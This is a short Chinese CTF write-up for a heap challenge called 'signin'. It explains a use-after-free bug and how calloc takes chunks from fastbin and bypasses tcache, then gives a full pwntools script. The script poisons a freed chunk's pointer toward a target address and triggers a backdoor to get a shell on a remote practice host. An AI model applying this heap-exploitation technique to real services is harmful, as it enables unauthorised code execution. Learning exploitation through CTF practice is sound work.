漏洞:uaf
新知识:
calloc函数会直接绕过tcache从fastbin中取,后门函数中又backdoor并且向其中写入数据1,所以我们只需有吧target的地址链入fastbin即可getshell
exp:
from pwn import *
from LibcSearcher import *
local_file = './signin'
local_libc = './libc-2.27.so'
# remote_libc = './libc-2.23.so'
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn', 28883)
libc = ELF(local_libc)
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.slafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def dbg():
gdb.attach(r)
pause()
menu = 'your choice?'
def add(index):
sa(menu, '1')
sa('idx?', str(index))
def edit(index, content):
sa(menu, '2')
sa('idx?', str(index))
sl(content)
def delete(index):
sa(menu, '3')
sa('idx?', str(index))
chunk_ptr = 0x4040E0
target = 0x4040C0
flag = 0x404160
edit_cnt = 0x4040BC
add_cnt = 0x404088
for i in range(8):
add(i)
for i in range(8):
delete(i)
add(8)
edit(7,p64(target-0x10))
sa(menu, '6')
r.interactive()